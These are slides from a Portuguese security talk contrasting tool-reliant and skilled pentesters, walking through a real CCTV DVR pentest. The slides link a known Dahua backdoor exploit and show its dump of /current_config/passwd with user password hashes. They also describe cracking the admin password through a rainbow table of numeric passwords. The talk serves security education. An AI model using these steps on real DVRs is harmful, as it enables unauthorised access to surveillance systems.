O documento discute as diferenças entre um "Pentester Nutella" e um "Pentester Raiz" ao realizar um penteste em um sistema de CFTV. O Pentester Raiz consegue explorar vulnerabilidades e obter acesso às credenciais de login do sistema ao analisar o código-fonte e encontrar um backdoor, enquanto um Pentester Nutella teria desistido. O Pentester Raiz demonstra como obteve a senha do usuário "admin" usando uma rainbow table de hashes gerados por um script público.
Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...
Palestra William Costa - Pentester Raiz vs Pentester Goumert
1. Pentester Raiz x Pentester Nutella.
William Costa
twitter @willcosta
william.costa arroba gmail.com
2. Pentester Raiz x Pentester Nutella.
Consultor em Segurança da Informação.
CISSP, C|EH, E|CSA, CPT, CEPT, LPI.
Palestras ministrada em H2HC,BHACK, MindtheSec, LACSEC, Co0L BSidesSP, CSM, TDC.
William Costa
3. Pentester Raiz x Pentester Nutella.
Pentester Raiz Pentester Nutella
4. Pentester Raiz x Pentester Nutella.
Reconnaissance
Pentester Nutella
PeekYou
Lullar
Recon-ng
Google Hack
Engenharia Social
Pentester Raiz
Dumpster Diving
7. Pentester Raiz x Pentester Nutella.
Demo
Irei demostrar o perigo de um Pentester Nutella.
Esse foi um pentest real realizado em uma empresa em um sistema de CFTV (DVR)
9. Pentester Raiz x Pentester Nutella.
Para um Pentester Nutella Seria o Fim.
10. Pentester Raiz x Pentester Nutella.
Vamos analisar os códigos da pagina de Autenticação, mais
especificamente o arquivo : /js/index.js
Temos a variável que aponta para um serviço de DDNS da DAHUA um fabricante chinês de DVR,
o que indica que a intelbras apenas modifica os logos para os seus, mas mantém o código da
DAHUA.
...var c="http://www.dahuaddns.com", ...
http://www.dahuasecurity.com/
11. Pentester Raiz x Pentester Nutella.
“Googando” temos mais de 51K resultados sobre
vulnerabilidades nos produtos dessa empresa
Incluído uma que permite ter acesso via um backdoor:
https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d
12. Pentester Raiz x Pentester Nutella.
Testando o backdoor...
sem sucesso...
Aparentemente o Intelbras
vez alguma coisa...
O Pentester Nutella já teria
desistio, mas não Josef
climber, ops quer dizer o
Pentester Raiz.
13. Pentester Raiz x Pentester Nutella.
Analisando Exploit, podemos ver que ele faz um
get do arquivo /current_config/passwd, que tem
a seguinte saída no nosso alvo:
## UGM 1.5
#id:name:passwd:groupid:authority:memo:share:bandlimit:mac:timesection:onlinetimeout:starttime:endtime:PasswordModifiedTime
#
1:admin:NtXqck4u:1:CtrPanel, ShutDown, Monitor, Monitor_01...
2:default:F3rxahJK:2:Monitor, Monitor_01...
3:pps:c1IZlmFo:1:Account, GeneralConf...
4:eddr:CPl7JVrg:1:Account, GeneralConf...
5:edmo:eEUXFpyp:1:CtrPanel, ShutDown, Monitor, Monitor_01, Monitor_02...
14. Pentester Raiz x Pentester Nutella.
Agora já temos acesso ao HASHs das senhas e
os usuários, vamos para o decrypt.
Encontrei um script em python que gera o hash a
partir da senha, desta forma criei uma Rainbow
Table de HASHS das senhas do DAHUA.
https://github.com/haicen/DahuaHashCreator/blob/master/DahuaHash.py
15. Pentester Raiz x Pentester Nutella.
000000 = qAj0oSP1
000001 = 88wL9sCX
000002 = A88aH60e
000003 = elgknAM0
000004 = 6zBtKK87
000005 = RaRu4qjT
000006 = I1mw4Gcd
000007 = RvtqLumX
000008 = 46awoS19
000009 = gHl75vSy
...
999990 = YYRdkMpH
999991 = 8GnrRukK
999992 = nEcsZDU9
999993 = xWQBTpDH
999994 = ShZHBBV2
999995 = 1ddhP4Fo
999996 = ea1kCUus
999997 = 3XaIFSxT
999998 = LJYigQTo
Na primeira tentativa foi gerado
apenas HASHs a patir de senhas
numéricas de 0 a 999999
16. Pentester Raiz x Pentester Nutella.
Após executar encontramos a
senha do usuário admin :
878632 = NtXqck4u
17. Pentester Raiz x Pentester Nutella.
Agora que temos a senha, basta testar o
acesso.
19. Pentester Nutella
Conclução
• Quem quer iniciar na aréa de teste de intrusão deve saber que as
ferramentas são apenas facilitadores e não a unica forma de relizar
um Pentest.
E o Principal:
Rodar ferramentas não lhe torna um
“HACKER”